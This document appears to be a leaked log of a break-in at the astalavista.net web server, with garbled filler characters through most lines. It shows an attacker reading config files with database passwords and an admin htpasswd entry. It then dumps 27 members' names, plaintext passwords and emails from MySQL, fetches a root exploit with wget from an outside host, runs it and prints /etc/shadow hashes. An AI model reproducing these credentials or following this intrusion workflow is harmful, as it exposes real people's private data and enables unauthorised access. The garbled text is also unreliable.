drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
- l" Y: R& h* z. m1 Z! jdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
: k" T- d# U4 G" Z# D-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg+ O' D. H2 Z; A! i! V& d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
/ \" [ g* v* Xdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
) O$ ^0 B4 a( k3 Sdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd; ~3 P) T5 N% s8 r* ]7 G
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php) h# v" Z3 F" K+ h* K" \
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico/ E) Y1 k& h# L# R9 ]) F. ^
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed6 H! l8 ]9 B% d3 J! S; G
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour* W! _; J& `' R6 g. m) t
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess# e/ l1 t* n) [; p
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
6 K2 I" J0 w5 Z- ?5 c5 V7 g6 l-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
. N9 a) q3 ?+ H4 z% L-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html( z/ G; b& f) t$ O9 }2 f7 P* c" t
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
0 n# b7 \6 d1 d) I-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php" X. v& Z; l4 S9 [
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf) H9 K7 [. L& t$ o; Z3 V) m
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
9 N* ]- ~, a' R' I- Odrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
( a2 e: G4 h8 ~& ~! f+ U/ l* Z/ fdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib' E5 J: K# S6 z% U
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log) b! M2 N! N8 R9 D2 S* p
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member0 B2 h3 |$ q! F9 _/ h
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata! A& j7 t8 q+ s+ C& d. F3 r& g
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
/ {/ Y1 P- N# ]: {-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf' S' N. a9 N0 |" v; P" G: D( L" y6 y
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re. s T" f+ A% }; ^9 b+ ^4 N5 O
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
5 H0 h# O8 d! ~6 ?drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
* i" U1 v. Y% ?+ }1 {drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources7 X9 ^( {8 f e$ a/ ]5 {
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com1 z5 w5 R$ |/ [2 f
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
$ ^! h8 F+ E, X" a) \/ K/ Ddrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
?4 U& e, |% M' K" k8 w/ L; Xdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl0 Z6 x# v& g5 S h0 t4 D
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 F6 n6 E0 E, V3 y3 R: L; p; L/ D8 K
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
) Y( l i& [, C; Q-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
$ Q& |' k: N* U& Sdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
9 P. G& \0 G j: A1 b- o) u, U2 g4 h$ i: Z/ J$ A
sh-3.2$ head -20 index.php9 F% B* F% r6 b7 U' T+ A& B7 y
<?PHP
6 `. l3 x& I/ i, {/**5 }5 R2 [5 z/ G) y
* Mainfile (external) for astalavistaNET v2.05 m! _+ A8 O8 A8 w; b! i" P7 ~
* `' B3 r; [' U+ u: y G5 C
* @copyright Astalavista IT Engineering GmbH
- Z- j9 _2 Y; g! i% k3 y- ? `* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>2 c* \5 y- J% R4 T
* @version 1.0
6 d5 D2 F, @, q1 J% `% @*/
5 V0 Z* |4 `# D0 k9 T) ^4 X7 o, P2 Q7 n% e3 C
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {+ b$ e4 E- I/ t/ `
$dontStartSession = false;
! C+ L& j+ _$ X } else {
, \ @* A4 N/ T2 [5 p O7 c $dontStartSession = true;
/ K6 B( M' i, |9 N% d. ? }/ g/ N8 k' }/ [$ V) v* e/ V
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
" P0 g4 k' b+ D9 l require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
+ _& q* Q: {; u. L require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
7 `+ @: _' d$ B4 s require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);1 r# R" Y) C, g1 O, `- h
0 T1 m" P/ ^ Q2 m$ y" B2 Q
sh-3.2$ cd config
" R; L" L5 G; [7 \" Osh-3.2$ ls -la$ F* c+ e% n* g7 X
total 32
3 `5 t' K T/ d% Mdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .8 M/ {9 w( T& {; S9 B
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... ~$ h4 Y7 `5 j2 A
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php9 T9 L( ]7 v* P
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php. @! l# Q% x& A3 C; B
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
2 _0 i3 R( g. z-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php* T3 f5 @& C3 o9 _1 ~, ?; \
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php# i% C! x3 S7 V H. C* Y6 L( f8 m$ D
4 ?- f" F" `. gsh-3.2$ cat com.conf.php
* K; I9 x( g; q7 M[snip]
# S% u: R# x2 l9 m//member-database7 |0 P1 @& N$ \! l# n$ s
$_CONFIG['db_mem_server'] = ‘localhost’; j, m& S5 h1 T! }$ h5 J9 z8 y7 U
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
# k, d/ G% B( s5 F$_CONFIG['db_mem_user'] = ‘astanet_db’;+ F1 F" b1 D4 W9 A& V& @9 h: N1 Q
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
- L6 W: ]4 T( M3 s7 }) p$_CONFIG['db_mem_debug'] = false; //true or false
\7 W# D. n7 R$ m! }6 ^//ads-database5 b8 }5 |) b; s
$_CONFIG['db_ads_server'] = ‘localhost’;& Y/ t/ `* E! p/ I9 R8 u
$_CONFIG['db_ads_database'] = ‘astanet_ads’;$ _2 o5 t! F) ?9 r
$_CONFIG['db_ads_user'] = ‘astanet_db’;
) U k. C" z0 y$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;, k# {7 ]' A" H2 j3 m: Y6 U& @& j
$_CONFIG['db_ads_debug'] = false; //true or false) G! A! n5 _3 Q# b S a
//rainbow-database, B$ A' B7 R, K) [+ J4 u% X+ h
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
8 [, i& Q) S/ h+ v$_CONFIG['db_rainbow_database'] = ‘rainbow’;
# [2 v P6 j4 A$_CONFIG['db_rainbow_user'] = ‘dinu’;8 H& E' u( S* A' H0 F3 ]9 A# e
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;" C Y/ Z/ m$ I# @+ K5 o5 y
$_CONFIG['db_rainbow_debug'] = false; //true or false
, s) x* H$ ?( F, x3 A//mailing lists database: t# p6 `, S! M& ?8 U8 M. G4 Z
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
- ]1 V e5 c( q& {$ h8 v1 V$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
& w/ Z+ @9 f1 c4 U$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;+ h* ?+ z9 C i0 S3 [3 q& h- D
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;9 e& X$ i2 {) Y1 q( ]" [ M
$_CONFIG['db_mailing_lists_debug'] = false; //true or false: j/ a. w* S7 K6 Q7 ?8 s w( V
//paypal) s2 e7 V( ^9 R; b4 [
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
2 k; n; w& n% _5 y$_CONFIG['sub_pp_cmd'] = ‘_xclick’;" n- N3 a! R: h9 `7 U& T, H. j
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
8 f8 e9 ~4 `2 u( N$_CONFIG['sub_pp_noship'] = ‘1′;6 |3 i5 ^3 s5 ?0 b& J: m% H9 v
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;9 Q% U! v t# c9 z# U2 F# e& g
[snip]
* d7 B* @* n! Z$ T
B# u& B+ ] f: Ash-3.2$ cd .., \; T1 F2 C' c# J% c4 p- X4 k
sh-3.2$ cd member
6 Z( k3 I4 k4 y2 ]; k3 I6 n) tsh-3.2$ ls -la: i3 `/ p. s" ~3 P! o
total 20
& G# |, k0 j& [# \& jdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .1 Z7 W, L9 {) e( `% O
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. |6 B: \- l) U6 W1 I: v, R' u
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
2 Z( B: w* `6 u9 s-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
8 ]0 b1 a3 u/ r( Y" zsh-3.2$ cat .htaccess
+ O7 N1 o* G6 q- Q' `# {! v: x2 sSecFilterEngine off
+ K' e6 Z1 f. } ^
3 i% |( }6 e5 M4 ^* [sh-3.2$ cd ..
# m8 z+ _( X- E# H+ Vsh-3.2$ cd cron
) L5 U/ j' A5 n, R5 Q8 N4 s' z5 Dsh-3.2$ ls -la
' C: h `4 R1 ktotal 168
; ^& i* Z. s0 [# w7 x! l; }drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
2 m0 R, |& @8 sdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... R; {* R' o1 ` e1 L
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php E. V# ~# |3 {' D: G2 Z) B
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
2 `: n1 c+ D* j4 N-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
; |0 O6 V6 p' _- a+ j1 f-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
) K% {0 O+ k7 d5 N-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php( T* e1 i `8 h& n/ H' B8 t; u! m
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
! l7 r4 ]6 P& O+ X-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php* R) W. h: X# t; R
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
1 {% n8 H ]( T* V-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh9 l0 H: @8 O% ~( m* v
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 d5 x6 ~8 E; V" R. D7 C, c; Q
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
" }8 t! }. v( h3 a-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
& P- I" ]) e2 E4 i9 M-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
- q2 `/ G. K: ~, e7 R) [-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php3 ?8 N* t( Y# P5 H J
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
& N1 h8 Q, T% o) R7 }8 G- `" }8 c-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php+ a. e' G- l9 B4 F) {7 P9 @
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php1 c4 o& I9 [* Y3 l, ^: ^0 f
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php: ~3 |' G( k% q0 s0 E
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email6 J5 u% n' O. @1 |) }+ I
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php2 R5 K2 M, D' c* t8 V
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
/ L, ?8 r- v$ g B5 Z" P" ~. ]( l r3 G7 b5 C* C' G2 _- o
sh-3.2$ cd ..8 M; `5 @5 i& t
sh-3.2$ cd _0071 P) |8 u/ k- v( T, l' C' m
sh-3.2$ ls -la4 P6 J; w1 O/ {" M# O& d3 Z, t/ I
total 24
* ?2 ]% \& t6 ?drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .% u' e0 P& C- _9 c$ J* H! n3 u: o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ X( r6 E" d# q/ R* I. Q) b' l
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
& J& R: P* I9 N-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php; N, `9 {! M7 J. q" L
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php* w# f" I- C4 V! q- |5 m$ r& G& M y
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
4 \" k/ }; B- Z, s6 _
4 t5 \5 S( W; nsh-3.2$ cat .htaccess/ t+ W! J4 B v' A% l
authType Basic2 V2 B1 x# z' K! `. D' k
authName Admin
y0 c, T% Z/ c, [) N8 t" u) @$ QauthUserFile /home/astanet/auth/.htadm_pwd2 `, n- O* d* m: e7 x5 L( k- |) J* y
require valid-user
$ \6 s2 P, ^, z# b" I ?+ B s9 F+ N9 A( ]5 `0 {
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
+ @1 G& x5 ]# ?! \ X y$ S$ C x" hadmin2net:CR0bl65MwhfT* d- F4 W1 s$ F1 Z6 C+ ~
5 G1 k9 c L4 E8 S3 z8 qsh-3.2$ mysql -u astanet_db -p! ~: Y0 Y1 z9 ?! p
Enter password:
8 A) H% u; r y: r2 ~3 X7 FWelcome to the MySQL monitor. Commands end with ; or \g.
0 r1 `/ _ @7 A/ B1 d' M5 `Your MySQL connection id is 275153% B! Q( K; U9 X& M! d" q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)2 [0 [ S/ X' r2 J5 S. P* \9 D8 x
Q: X# x6 }) Q1 @' X9 b* ^+ r R
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! v( P! e6 ~0 U! T0 Y
, }9 A: {! ]1 o" c% w( jmysql> show databases;* |% W/ C _( ~! ~! e, h
+———————–+ F4 l% y' M* Y. _. k* D
| Database |6 |/ I: o; n# f& J# l) e- M+ x
+———————–+2 e5 s) s% B& d$ x% k' A
| information_schema |
& M& z" ?( C1 ^0 P) K/ S4 N| astanet_ads |$ e, E" S" A, M) b# H
| astanet_mailing_lists |6 W, J& n$ T# m+ z+ I* l, [) f: b
| astanet_mediawiki |: z9 u. B% G' n& y3 C
| astanet_membersystem |5 a$ K! G. S. |) a( i7 h0 i8 }# B
| test |
1 v6 K5 i# X$ ]9 V& d3 r+———————–+' {3 c3 e+ ^; Q4 E$ {8 a8 o* T
6 rows in set (0.00 sec)
4 }3 w! a0 e# K4 w% |! S. W: t; u3 y7 g
mysql> use astanet_membersystem
9 f: k* ~7 q2 K# i; G# Q+ rDatabase changed, h6 i6 z1 j8 j# G
mysql> show tables;/ t. \- z9 l/ I& a' q' k: c( o/ [' @
+———————————–+& z2 z7 ?% V9 c
| Tables_in_astanet_membersystem |
& O# }1 ~1 V* {, V3 J( t+———————————–+
) E2 P, V6 d0 ]2 k) S, p2 x+ \| blacklist_categories |" A2 s1 s4 J M7 F8 H
| blacklist_content |
~" K" A/ ~9 o9 ?9 T| blacklist_levels |& k: V/ `3 t9 D9 I
| blacklist_mcset |
* G9 r' u3 e6 w/ P| dir_categories |
3 v+ k9 v; j9 a4 S i, ~! x| dir_comments |
, x _% K+ H& ?2 a| dir_links |+ O8 p0 U8 r+ D$ R+ f4 j3 W1 T- u
| dir_temp |
a$ ]+ q" b" Y: W7 h+ ]' P% W| dir_votes |
3 d5 d' j ~* e; m| documents |% G0 d: E7 V, D! R/ J& T
| documents_categories |5 ~) ~1 r* q! E& G( S
| email_content |: E9 x8 O" v, r
| email_settings |
W& X" M+ r8 H7 G* q| exploits |
% P6 `' A# O' {; B; @+ b| exploits_categories |
0 Z( ]' n- @: f6 `: I( X| exploittree_categories |
- T: O t3 m) b" M| exploittree_exploits |; I* P- j6 f9 g; o1 y7 D! y
| home_values |
6 N4 Q ]- m, w w| iso_countries |
% Z: k4 p( S# }% s| links_categories |! P# B, N: d& n
| links_records |& { z; s0 c8 w$ c. d* x
| links_unauth |
) q" ]# P+ X* U/ i| links_votes |
) A# q* S: b$ W1 X| log |+ f' s5 R3 _" {& d
| news_categories |
! v' m+ J+ X3 u| news_comments | J/ `, L3 x% j
| news_emoticons |+ B+ K# d& K4 u) d# N
| news_latest |1 H/ o+ X- C5 }1 [! r+ ~
| news_messages | Y* P' R. F( G5 V$ E9 |
| news_statistics |& Y! n6 ?( w. ~. q F
| news_votes |
7 o2 U2 a7 J) c2 g' f( G0 ]; X| prices_content |
, i9 v! k% U6 q; t7 E, a| prices_offers |2 [* V+ L5 v; i+ S5 l
| rss_settings |5 ~ b8 S( t, Q4 I, w9 v/ ^5 b L
| sessions |6 o1 f$ a4 b0 c0 F- x; L: y+ I
| stats_signups |2 |8 R1 r% q+ r# Y0 j
| u2u2 |
& o4 M3 y, W1 J7 N( N# `| u2u_contact |
+ f. O0 t& H Z2 a! P" ~| u2u_settings |
* ^- B3 _( V9 d5 e$ i| user_keywords_selected_categories |6 w" V# {, l/ |8 D* N
| users |9 p% ^% W' V! U) m% ^. v5 J
| users_ipn_test |
5 g# R+ k; u! u/ C9 E3 S7 ]| users_keyword_values |/ \0 d! S4 y9 a1 Y3 ]* H1 S9 ]
| users_profile |
' h7 L0 T Q! Z2 m| users_temp |, ]1 Q- T$ f! I6 G9 u
| users_upgrade |+ ]! o: k, ]- P
+———————————–+
: m! O" y0 G! O0 w1 P7 W46 rows in set (0.00 sec)
. j: O& V2 u2 w7 s1 ~# @
$ [6 T P# m4 W! [+ Q1 c( tmysql> describe users;" G) V3 n! e! Y, g
+————————–+————————————–+——+—–+———————+—————-+
. z; }5 Q- [. t# Y0 M5 G| Field | Type | Null | Key | Default | Extra |
# ~ y% v0 ?% t+————————–+————————————–+——+—–+———————+—————-+
0 l- A7 T" K D2 a R% N| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
) z2 \2 h3 N/ L4 @ f4 b| user | varchar(50) | NO | | | |
, F! z* o4 i8 s0 Y/ I6 T3 `| nickname | varchar(30) | NO | MUL | anonymous | |
6 a( n' U8 m I6 s; W| password | varchar(30) | NO | | | |
/ N8 V) _6 ^3 U9 C: A7 l| userlevel | tinyint(3) | YES | MUL | NULL | |
! V: y$ B, \( H4 d6 a8 y. i| exp | int(8) unsigned | NO | | 0 | |: \4 {2 s7 Q4 G% u1 ]$ }! ~, c
| email | varchar(50) | NO | | | |+ n5 Q( t/ j! ~$ @" v7 k8 x
| ip | varchar(15) | NO | | 0 | |
) x- B) p7 Z. ~8 ^6 X| proxy | set(’0′,’1′) | NO | | 0 | |; R2 @! u) A3 o8 f- [6 ^
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
6 X2 i; r( @3 I. ]. K| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |' z5 M5 x. g; v: M$ s) {% i# U
| anz_in | tinyint(1) | NO | | -1 | |
/ I+ N7 v& [; T/ x/ l. [1 a+ c# X2 G| status | tinyint(1) unsigned | NO | | 0 | |. R1 D, x$ Y% Z; `$ H4 z, h
| checked | set(’0′,’1′,’2′) | NO | | 0 | |9 |( z1 D" s5 r" A! w/ @; s- s
| freemember | set(’0′,’1′) | NO | | 0 | |5 `$ }/ ^4 [( s% J
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |1 B% r7 h& G/ ]; U
| lang | tinytext | NO | | | |
8 S4 E% t4 z" Y e3 R| adid | smallint(6) | NO | | 0 | |7 r, b4 g6 b, j3 T- A* F- W; s
| pp_txn_id | varchar(255) | YES | | NULL | |
: K+ e( D( z ]9 y# c; f- x| cnb_transaction_id | varchar(255) | YES | | NULL | |
9 N; Z/ n D0 f: i& A| cnb_order_id | varchar(255) | YES | | NULL | |
' |; @0 K. s, M9 g- i9 r* @| cnb_user_id | int(11) | YES | | 0 | |
" X3 r9 C$ q4 v! y+ e: ?+————————–+————————————–+——+—–+———————+—————-+
/ S8 P7 o% x! U9 o- U22 rows in set (0.01 sec)
8 J; _0 }( ?/ [7 Q1 q4 u3 y1 P1 `* Q' @' f( X; O, F+ J0 R9 G
mysql> select count(*) as skids from users;
5 O$ f. ~* N5 l6 c& o* t E+——-+' ~7 b! I) q4 u1 K
| skids |& H6 i# B7 v2 }, U
+——-+! W P9 d# M3 d. ?+ A! u* T
| 25199 |" N. w- R4 c. e
+——-+5 @8 o6 H% c! M" q' m/ s9 D
1 row in set (0.00 sec)' g3 A4 t( O g+ c/ S# h
$ y+ G! j F6 n# D0 T! x. c+ `) Vmysql> select user,nickname,password,email from users where userlevel = 1;
( f% H) f3 k p% e+————————–+———————-+——————+———————————–++ z7 s% f: V# X1 Z. ?
| user | nickname | password | email |+ [6 X9 o: F& P# x! r4 r+ A: _
+————————–+———————-+——————+———————————–+
( z0 d/ _$ @9 e5 k/ t5 h/ Q( \| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
3 ]* H4 V5 @. c) @| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
$ T3 \! S3 ~& b+ `| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |7 \6 c5 s/ C9 g" @0 S$ ~: \ G
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
1 O; V7 y1 l" x# ^. k4 f8 K| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |1 q+ Z4 F% h$ j j+ t
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |* I( ~& W) a9 h; G/ J6 O$ d
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |; L& _8 j& l6 X+ u0 S3 v9 K0 t
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
g2 j, N1 t& q) \| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
. t; \. r, x% O, j$ I( z" G2 ^| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
3 Q+ B+ N$ O4 \| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
; w- b2 a* q9 ~4 t4 K; p| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |8 M# ^! ~9 M) W
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 `& C; a7 n7 a" J- s' g
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |' \& n! k2 @1 l( }) h' U1 t' u
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com | C+ D5 F* o6 a: y5 x. v
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |! a5 n' w4 w6 O$ m( d* s3 n
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
: G2 n, I) F( G5 D; O* h| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
* t) P$ p( R* F, || Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
' U/ C: O- ]4 a. U( e| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |4 e# V# ^& o: H: T
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
I1 W+ f3 {1 A+ k% N5 }1 a+ C| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
0 X$ `/ k% p8 n6 c( f| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |( s4 e7 Z4 I- G* d9 H0 d9 i; c7 {7 W
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
2 l/ a1 A6 E( s, [/ ~| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
. y* t, j' X* V; L; g: E| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
' M/ R6 g7 T2 r" Y! K' `| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |3 Q' H! h2 u0 B! S* t4 D2 I) D3 H
+————————–+———————-+——————+———————————–+
: L" G0 Z7 Y/ Q5 R+ t3 l27 rows in set (0.00 sec)6 h4 e; K0 s2 }( @) J+ X
/ y; d: N0 d& imysql> exit;
3 ^: h! G6 e0 l3 v& E$ C' t7 yBye- E3 v! N$ T8 O n5 w
8 k* N! R( b6 i+ ]7 f4 G; D$ B[~] plaintext passwords? yes,/ P: t& s* r% }. x: R2 a
Those so called “security professionals” who charge you $6.66 / month to$ @; |5 |5 G* v1 D
register at their hack-proof portal, save your passwords in plaintext…$ d l( z' P1 O% b7 G+ I( @) d' R
brilliant!
m1 q1 t$ ]# Y3 n0 ]
6 o" K$ l! q! C8 L( V' q[~] This been fun but we want more.
) p/ E) ]7 c7 ^/ F% D$ ]1 _$ x+ I7 G; S
sh-3.2$ uname -a6 `' z5 Y# o! w
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
S3 C" N3 i) d+ G) O' c: m Esh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]- o4 N0 i7 b* E/ @, g
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]& Z# ~ S- b% H5 n
Resolving anti.sec.labs… 13.33.33.37
+ J3 s' [; H% a9 `7 \8 ^Connecting to anti.sec.labs|13.33.33.37|:80… connected.: x8 z5 j( F8 ?% T- W: b9 z% h
HTTP request sent, awaiting response… 200 OK
! X- h; ]6 q. F8 c2 Z' pLength: 18200 (18K) [text/plain]
2 a: o- c* H/ f) y# B$ k' @3 QSaving to: `g0troot’" C& d4 c8 R" [0 ~+ X
5 z3 F, ^8 A6 O* [ V2 V1 q100%[=========================================================================================================================================>] 18,200 58.6K/s in& Y: |0 w# f" ]7 \+ Q2 B% b5 r X
0.3s" e0 W- H7 Q* H4 K. o6 Y9 L2 d
Q7 i1 \& k; k' z4 o& d- q18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]- n: y5 C- s( R& ~8 m/ L
: E1 W& l+ R, o1 k" M6 n+ Z( @sh-3.2$ ./g0troot -i x86_646 T6 N$ h) x2 R% b+ `! F G
[+] g0troot - anti.sec.labs8 Y; D4 t, ~ Z. Y! l
[+] Target: 2.6.18-128.1.10.el5
, Z! m2 I6 x9 K: u; U- a2 c' V[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
% G. f9 I9 ~- D& p) S9 M
" M6 ]/ \- M" A9 d' l9 n[+] r00tr00t$ H0 v+ k* ]! [7 r e
[~] Executing shell…
: {* @$ v6 d) z6 Z J A" f7 \
' n* S M% R- Ash-3.2# id/ }7 o3 u9 [. Z4 o& k
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)# R8 j- \' L5 n& m9 _) @1 L
0 e- D" z( w* [- T' ^* |sh-3.2# cat /etc/shadow0 e0 n# N8 T) h4 [7 i' ^
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
# i# ~% p& B4 M7 ]4 M, t T' X[snip]' l: P4 \! i! ^$ r
admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
& d$ @* U5 w" l$ R/ B$ @# C7 _0 w1 Wjon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
( _" U+ X5 r: i! z$ Gcom 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::* J5 ^# |. P; u* p) \0 Y' p \
astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::7 s/ p+ y& G, G* x7 w
' p2 m; I4 C9 Y# E" f
sh-3.2# cat /etc/motd& l% A& J* I) ]5 L* e' i
